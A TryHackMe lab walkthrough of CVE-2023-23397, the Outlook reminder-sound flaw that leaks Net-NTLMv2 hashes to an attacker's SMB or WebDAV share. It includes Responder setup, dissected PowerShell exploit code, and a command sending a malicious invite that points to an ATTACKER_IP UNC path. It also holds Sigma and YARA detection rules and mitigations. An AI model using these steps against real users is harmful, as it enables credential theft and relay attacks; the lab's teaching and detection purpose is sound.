Outlook NTLM Leak | Tryhackme Writeup/Walkthrough | By Md Amiruddin

Leak password hashes from a user by sending them an email by abusing CVE-2023–23397.

Room Link : https://tryhackme.com/room/outlookntlmleak

Task 1 : Introduction

On Tuesday, March 14th, Microsoft released 83 security fixes on Patch Tuesday, including CVE-2023–23397. This critical vulnerability impacts all versions of the Outlook desktop app on any Windows system. Outlook web app (OWA) and Microsoft 365 aren’t vulnerable since they do not support NTLM authentication.

Unlike most exploits, this one is particularly dangerous because it is a zero-click exploit, meaning no user interaction is required to trigger it. Once an infected email arrives in the user’s inbox, the attacker can obtain sensitive Net-NTLMv2 credential hashes. Once malicious actors have those hashes, they can get a user’s credentials, authenticate to their system and escalate privileges.

Starting the VM

To deploy the attached VM, press the green Start Machine button at the top of the task. The machine should launch in a split-screen view. If it doesn't, you can press the blue Show Split View button near the top-right of this page. All of the room can be done in split view, but if you prefer connecting to the machine via RDP, you can use the following credentials:

Username : Administrator

Password: Password321

Your VM has a trial version of Outlook installed, so feel free to ignore any activation messages. When opening Outlook, you can also close the “Sign in to set up Office” screen without a problem to continue:

You will also need to use the AttackBox, so this is a good moment to hit the Start AttackBox button at the top of the room.

Task 2 : Abusing Appointment Alerts

Outlook Appointment Alerts

On Outlook, it’s possible to add reminder notifications when sending calendar invitations:

You can specify the audio file played when a user gets a notification reminder for a calendar meeting or event. Typically, this would be used for a user to set up their own notifications by pointing to an audio file:

Manipulating this parameter can enable a threat actor to force Outlook to leak the current password hashes to an attacker with zero interaction required.

Abusing Reminder Sounds via UNC Paths

To exploit this vulnerability, an attacker must create a malicious calendar invitation that includes a reference to a sound file pointing to a file in a network share in the attacker’s machine. At a low level, an Outlook email stores the reference to the sound file in an internal parameter called PidLidReminderFileParameter. To ensure that the audio we embed in our malicious email will take precedence over the victim’s default reminder configurations, we will also need to set another parameter called PidLidReminderOverride to true.

To set up the PidLidReminderFileParameter property to point to a network share, the attacker can specify a Universal Naming Convention (UNC) path instead of a local file. UNC is used in Windows operating systems to find network resources (files, printers, shared documents). These paths consist of a double backslash, the IP address or name of the computer hosting the resource, the share name and the file name. For example:

\\ATTACKER_IP\foo\bar.wav

When the victim receives the malicious email, the UNC path directs them to that SMB share, triggering the vulnerability. This causes the system to start an NTLM authentication process against the attacker’s machine, leaking a Net-NTLMv2 hash that the attacker can later try to crack.

If for some reason the SMB protocol isn’t a viable alternative to use, non-server versions of Windows will accept using UNC paths pointing to ports 80 or 443, and use HTTP to retrieve the file from a WebDAV-enabled web server. The syntax of such UNC path is as follows:

\\ATTACKER_IP@80\foo\bar.wav

\\ATTACKER_IP@443\foo\bar.wav

This may be useful to bypass firewall restrictions preventing outgoing connections to port 445 (SMB).

Answer the questions below :

1. Click and continue learning!
A. No answer needed

Task 3 : Crafting a Malicious Appointment

Now that we understand how the vulnerability works let’s craft a malicious email containing an appointment with the required parameters to trigger it.

Setting up Responder

Since we expect the victim to trigger an authentication attempt against the attacker on port 445, we will set up Responder to handle the authentication process and capture the NetNTLM hash for us. If you are unfamiliar with Responder, it will simply emulate an SMB server and capture any authentication attempt against it.

To launch Responder to listen for authentication attempts in your ens5 interface, you can simply run the following command in your AttackBox:

root@attackbox$ responder -I ens5

We are now ready to trigger an authentication attempt via the Outlook vulnerability.

Attempting to Handcraft a Malicious Appointment

As a first attempt, we could manually create an appointment and edit the path to the reminder’s sound file to point to a shared folder. To create an appointment, you will first need to click on the calendar and then on the New Appointment button on the taskbar, as shown in the image below:

We will create an appointment that includes a reminder set in 0 minutes so that it triggers right after the victim receives it. We will also click on the Sound option to configure the reminder’s sound file:

We can try setting the sound file path to a UNC path that points to our AttackBox and click the OK button like this:

However, Outlook will silently ignore the UNC path and revert to using the default WAV file, which can be confirmed by going back to the Sound dialogue:

Since Outlook isn’t expecting users to input a UNC path here, it probably discards our attempt as invalid output. But not all hope is lost!

OutlookSpy to the Rescue

Even if Outlook cannot set the reminder’s sound file to a UNC path, we can use the OutlookSpy plugin to achieve this. The plugin is already installed in your target machine for your convenience, and it will allow you to access all of Outlook’s internal parameters directly, including the reminder’s sound file.

To view our current appointment from OutlookSpy, click the OutlookSpy tab and then the CurrentItem button in the taskbar:

Note: Be sure to click the CurrentItem button from within the appointment, or you might modify different Outlook components.

From this window, you can see the parameters associated with the appointment’s reminder. We want to set the ReminderSoundFile parameter to the UNC path that points to our AttackBox and set both the ReminderOverrideDefault and ReminderPlaySound to true. Just for reference, here's what each parameter does:

• ReminderPlaySound: boolean value that indicates if a sound will be played with the reminder.
• ReminderOverrideDefault: boolean value that indicates the receiving Outlook client to play the sound pointed by ReminderSoundFile, instead of the default one.
• ReminderSoundFile: string with the path to the sound file to be used. For our exploit, this will point to a bogus shared folder in our AttackBox.

We can use the script tab and the following script to change the parameters to the required values:

Be sure to click the Run button for the changes to be applied. You can go back to the Properties tab to check that the values were correctly changed. Finally, save your appointment to add it to your calendar, making sure the reminder is set to 0 minutes and that the appointment matches the current time and date, as we want it to trigger immediately:

If all went as expected, you should immediately see a reminder popping up:

And you should receive the authentication attempt in your Responder console on your AttackBox:

Answer the questions below :

1. Click and continue learning!
A. No answer needed

Task 4 : Weaponizing the Vulnerability

Summarising the steps required to exploit the vulnerability, an attacker would need to:

1. Create a malicious meeting/appointment with a custom reminder sound pointing to a UNC path on the attacker’s machine.
2. Send the invite to the victim via email.
3. Wait for the reminder to trigger a connection against the attacker’s machine.
4. Capture the Net-NTLMv2 hash, use authentication relaying, or profit in any other way.

Steps 3 and 4 are already covered for us by Responder, but handcrafting the malicious appointment by hand is a bit tedious. Luckily, a couple of exploits are readily available for us to create and send a malicious appointment.

In this task, we will look at the exploit published by Oddvar Moe, which is probably the easiest to understand and use. This Powershell exploit leverages Outlook’s COM objects to build emails and appointments easily. It contains a couple of functions that we can use:

• Save-CalendarNTLMLeak: This function creates a malicious appointment and saves it to your own calendar. Useful for testing purposes.
• Send-CalendarNTLMLeak: This function creates a malicious appointment and sends it via email to a victim. The email invitation will be sent from your Outlook’s current default account.

Dissecting the Exploit’s Code

Both will create an appointment similarly, so we’ll explain the Save-CalendarNTLMLeak only.

First, we will instantiate an “Outlook.Application” object and create an appointment.

$Outlook = New-Object -comObject Outlook.Application
$newcal = $outlook.CreateItem('olAppointmentItem')

The usual parameters of an appointment will be set. These include the recipients, meeting subject, location, body and start and end dates. The exploit sets the start day to the current time so that the reminder is triggered immediately:

$newcal.Recipients.add($recipient)
$newcal.MeetingStatus = [Microsoft.Office.Interop.Outlook.OlMeetingStatus]::olMeeting
$newcal.Subject = $meetingsubject
$newcal.Location = "Virtual"
$newcal.Body = $meetingbody
$newcal.Start = get-date
$newcal.End = (get-date).AddHours(2)

The following additional parameters will be configured to point the reminder’s sound file to the attacker’s server, as previously explained:

$newcal.ReminderSoundFile = $remotefilepath
$newcal.ReminderOverrideDefault = 1
$newcal.ReminderSet = 1
$newcal.ReminderPlaysound = 1

Finally, the appointment will be sent to the recipient via email:

$newcal.send()

Using the Exploit

You can import the exploit’s functions with the Import-Module cmdlet. After that, both functions will be available in your current Powershell. To send an email with a malicious appointment, you can just run the following command:

Powershell

PS C:\> cd C:\Users\Administrator\Desktop\
PS C:\Users\Administrator\Desktop\> Import-Module .\CVE-2023-23397.ps1
PS C:\Users\Administrator\Desktop\> Send-CalendarNTLMLeak -recipient "test@thm.loc" -remotefilepath "\\ATTACKER_IP\foo\bar.wav" -meetingsubject "THM Meeting" -meetingbody "This is just a regular meeting invitation :)"

Be sure to replace ATTACKER_IP with the IP address of your AttackBox in the -remotefilepath parameter. Notice that you are using the exploit to send yourself an email in this case, as we have a single account in the machine, but normally you would target other email addresses.

Since the exploit makes use of the current Outlook instance to send the email, you will likely get a couple of alerts asking you to grant permission to the script to send emails on your behalf. Make sure to press Allow as many times as needed. Marking the “Allow access for 10 minutes” checkbox should also help speed this process up:

Answer the questions below :

1. Click and continue learning!
A. No answer needed

Task 5 : Detection/Mitigation

Now that we have gone through the steps to weaponize the CVE-2023-23397 attack on Outlook, let's talk about a few ways to detect this attack within the network. Each attack leaves patterns or artifacts that could help the detection team identify the threats. It all depends on the network visibility and the log sources that are being collected and providing the much important visibility.

Here, we will discuss a few ways to detect this attack on the host.

Sigma Rules

The following Sigma rule detects Outlook initiating a connection to a WebDav or SMB share, indicating a post-exploitation phase.

title: CVE-2023-23397 Exploitation Attempt
id: 73c59189-6a6d-4b9f-a748-8f6f9bbed75c
status: experimental
description: Detects outlook initiating connection to a WebDAV or SMB share, which
  could be a sign of CVE-2023-23397 exploitation.
author: Robert Lee @quantum_cookie
date: 2023/03/16
references:
- https://www.trustedsec.com/blog/critical-outlook-vulnerability-in-depth-technical-analysis-and-recommendations-cve-2023-23397/
tags:
- attack.credential_access
- attack.initial_access
- cve.2023.23397
logsource:
  service: security
  product: windows
  definition: 'Requirements: SACLs must be enabled for "Query Value" on the registry
    keys used in this rule'
detection:
  selection:
    EventID:
    - 4656
    - 4663
    ProcessName|endswith: \OUTLOOK.EXE
    Accesses|contains: Query key value
    ObjectName|contains|all:
    - \REGISTRY\MACHINE\SYSTEM
    - Services\
    ObjectName|endswith:
    - WebClient\NetworkProvider
    - LanmanWorkstation\NetworkProvider
  condition: selection
falsepositives:
- Searchprotocolhost.exe likes to query these registry keys. To avoid false postives,
  it's better to filter out those events before they reach the SIEM
level: critical

This Sigma Rule looks to detect svchost.exe spawning rundll32.exe with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie, which indicates a post-exploitation/exfiltration phase.

title: Suspicious WebDav Client Execution
id: 982e9f2d-1a85-4d5b-aea4-31f5e97c6555
status: experimental
description: 'Detects "svchost.exe" spawning "rundll32.exe" with command arguments
  like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of
  exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially
  a sign of exploitation of CVE-2023-23397
  '
references:
- https://twitter.com/aceresponder/status/1636116096506818562
- https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/
- https://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/
author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
date: 2023/03/16
tags:
- attack.exfiltration
- attack.t1048.003
- cve.2023.23397
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: \svchost.exe
    Image|endswith: \rundll32.exe
    CommandLine|contains: C:\windows\system32\davclnt.dll,DavSetCookie
    CommandLine|re: ://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}
  filter_local_ips:
    CommandLine|contains:
    - ://10.
    - ://192.168.
    - ://172.16.
    - ://172.17.
    - ://172.18.
    - ://172.19.
    - ://172.20.
    - ://172.21.
    - ://172.22.
    - ://172.23.
    - ://172.24.
    - ://172.25.
    - ://172.26.
    - ://172.27.
    - ://172.28.
    - ://172.29.
    - ://172.30.
    - ://172.31.
    - ://127.
    - ://169.254.
  condition: selection and not 1 of filter_*
falsepositives:
- Unknown
level: high

These SIGMA rules can be converted into the detection and monitoring tool to hunt for suspicious log activity within the network. To learn more about SIGMA rules, check this introductory room on Sigma.

Yara Rule

YARA rule looks for the pattern within the files on disk. The following three community YARA rules can be used to detect the suspicious MSG file on the disk with two properties discussed in the above tasks.

rule SUSP_EXPL_Msg_CVE_2023_23397_Mar23 {
   meta:
      description = "MSG file with a PidLidReminderFileParameter property, potentially exploiting CVE-2023-23397"
      author = "delivr.to, modified by Florian Roth, Nils Kuhnert, Arnim Rupp, marcin@ulikowski.pl"
      date = "2023-03-15"
      modified = "2023-03-17"
      score = 60
      reference = "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/"
      hash = "47fee24586cd2858cfff2dd7a4e76dc95eb44c8506791ccc2d59c837786eafe3"
      hash = "582442ee950d546744f2fa078adb005853a453e9c7f48c6c770e6322a888c2cf"
      hash = "6c0087a5cbccb3c776a471774d1df10fe46b0f0eb11db6a32774eb716e1b7909"
      hash = "7fb7a2394e03cc4a9186237428a87b16f6bf1b66f2724aea1ec6a56904e5bfad"
      hash = "eedae202980c05697a21a5c995d43e1905c4b25f8ca2fff0c34036bc4fd321fa"
   strings:
      /* https://interoperability.blob.core.windows.net/files/MS-OXPROPS/%5bMS-OXPROPS%5d.pdf */
      /* PSETID_Appointment */
      $psetid_app = { 02 20 06 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
      /* PSETID_Meeting */
      $psetid_meeting = { 90 DA D8 6E 0B 45 1B 10 98 DA 00 AA 00 3F 13 05 }
      /* PSETID Task */
      $psetid_task = { 03 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
      /* PidLidReminderFileParameter */
      $rfp = { 1F 85 00 00 }
      /* \\ UNC path prefix - wide formatted */
      $u1 = { 00 00 5C 00 5C 00 }
      /* not MSI */
      $fp_msi1 = {84 10 0C 00 00 00 00 00 C0 00 00 00 00 00 00 46}
   condition:
      uint32be(0) == 0xD0CF11E0
      and uint32be(4) == 0xA1B11AE1
      and 1 of ($psetid*)
      and $rfp
      and $u1
      and not 1 of ($fp*)
}

rule EXPL_SUSP_Outlook_CVE_2023_23397_Exfil_IP_Mar23 {
   meta:
      description = "Detects suspicious .msg file with a PidLidReminderFileParameter property exploiting CVE-2023-23397 (modified delivr.to rule - more specific = less FPs but limited to exfil using IP addresses, not FQDNs)"
      author = "delivr.to, Florian Roth, Nils Kuhnert, Arnim Rupp, marcin@ulikowski.pl"
      date = "2023-03-15"
      modified = "2023-03-18"
      score = 75
      reference = "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/"
      hash = "47fee24586cd2858cfff2dd7a4e76dc95eb44c8506791ccc2d59c837786eafe3"
      hash = "582442ee950d546744f2fa078adb005853a453e9c7f48c6c770e6322a888c2cf"
      hash = "6c0087a5cbccb3c776a471774d1df10fe46b0f0eb11db6a32774eb716e1b7909"
      hash = "7fb7a2394e03cc4a9186237428a87b16f6bf1b66f2724aea1ec6a56904e5bfad"
      hash = "eedae202980c05697a21a5c995d43e1905c4b25f8ca2fff0c34036bc4fd321fa"
      hash = "e7a1391dd53f349094c1235760ed0642519fd87baf740839817d47488b9aef02"
   strings:
      /* https://interoperability.blob.core.windows.net/files/MS-OXPROPS/%5bMS-OXPROPS%5d.pdf */
      /* PSETID_Appointment */
      $psetid_app = { 02 20 06 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
      /* PSETID_Meeting */
      $psetid_meeting = { 90 DA D8 6E 0B 45 1B 10 98 DA 00 AA 00 3F 13 05 }
      /* PSETID Task */
      $psetid_task = { 03 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
      /* PidLidReminderFileParameter */
      $rfp = { 1F 85 00 00 }
      /* \\ + IP UNC path prefix - wide formatted */
      $u1 = { 5C 00 5C 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 3? 00 3? 00|3? 00 3? 00|3? 00) }
      /* \\ + IP UNC path prefix - regular/ascii formatted for Transport Neutral Encapsulation Format */
      $u2 = { 00 5C 5C (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 3? 3?|3? 3?|3?) }
      /* not MSI */
      $fp_msi1 = {84 10 0C 00 00 00 00 00 C0 00 00 00 00 00 00 46}
   condition:
      (
         uint16(0) == 0xCFD0 and 1 of ($psetid*)
         or
         uint32be(0) == 0x789F3E22
      )
      and any of ( $u* )
      and $rfp
      and not 1 of ($fp*)
}

rule EXPL_SUSP_Outlook_CVE_2023_23397_SMTP_Mail_Mar23 {
   meta:
      author = "Nils Kuhnert"
      date = "2023-03-17"
      description = "Detects suspicious *.eml files that include TNEF content that possibly exploits CVE-2023-23397. Lower score than EXPL_SUSP_Outlook_CVE_2023_23397_Exfil_IP_Mar23 as we're only looking for UNC prefix."
      score = 60
      reference = "https://twitter.com/wdormann/status/1636491612686622723"
   strings:
      // From:
      $mail1 = { 0A 46 72 6F 6D 3A 20 }
      // To: 
      $mail2 = { 0A 54 6F 3A }
      // Received:
      $mail3 = { 0A 52 65 63 65 69 76 65 64 3A }
      // Indicates that attachment is TNEF
      $tnef1 = "Content-Type: application/ms-tnef" ascii
      $tnef2 = "\x78\x9f\x3e\x22" base64
      // Check if it's an IPM.Task
      $ipm = "IPM.Task" base64
      // UNC prefix in TNEF
      $unc = "\x00\x00\x00\x5c\x5c" base64
   condition:
      all of them
}

YARA is already installed on the machine. The YARA rule file cve-2023-23397.yar and the malicious MSG file appointment.msg can be found on the Desktop. Open the terminal and run the following command to run the rule against the MSG file.

Powershell

PS C:\USers\Administrator\Desktop> yara64 .\cve-2023-23397.yar.txt .\appointment.msg
SUSP_EXPL_Msg_CVE_2023_23397_Mar23 .\appointment.msg
EXPL_SUSP_Outlook_CVE_2023_23397_Exfil_IP_Mar23 .\appointment.msg

To learn more about YARA and its pattern-matching use, check this introductory room on YARA.

Powershell script

Microsoft has released a PowerShell script CVE-2023–23397.ps1 that will check the Exchange messaging items like Mail, calendar, and tasks to see if the IOCs related to the CVE-2023–23397 attack are found. The script can be used to audit and clean the detected items.

Note: This script is not usable in this lab.

Mitigation

This vulnerability is being exploited extensively in the wild. Some of the recommended steps as recommended by Microsoft in order to mitigate and avoid this attack are:

• Add users to the Protected Users Security Group, which prevents using NTLM as an authentication mechanism.
• Block TCP 445/SMB outbound from your network to avoid any post-exploitation connection.
• Use the PowerShell script released by Microsoft to scan against the Exchange server to detect any attack attempt.
• Disable WebClient service to avoid webdav connection.

Answer the questions below :

1. Click and continue learning!
A. No answer needed

Task 6 : Conclusions

In this room, we have experimented with how a simple vulnerability could allow an attacker to access authentication material without requiring any interaction from their victim by sending a simple, specially crafted email. NTLM Leaks are nothing new in Windows environments, but having one in such a widespread application as Outlook makes this particularly important.

While we have used the vulnerability to capture and crack the Net-NTLMv2 hash, the fact that we can trigger an authentication attempt on behalf of the victim also enables other types of relay attacks, where cracking the hash is not even needed.

As always, the preferred recommendation to avoid falling victim to such an attack is to keep your Outlook installation up to date, as patches are already available from Microsoft.

Thankyou for Reading.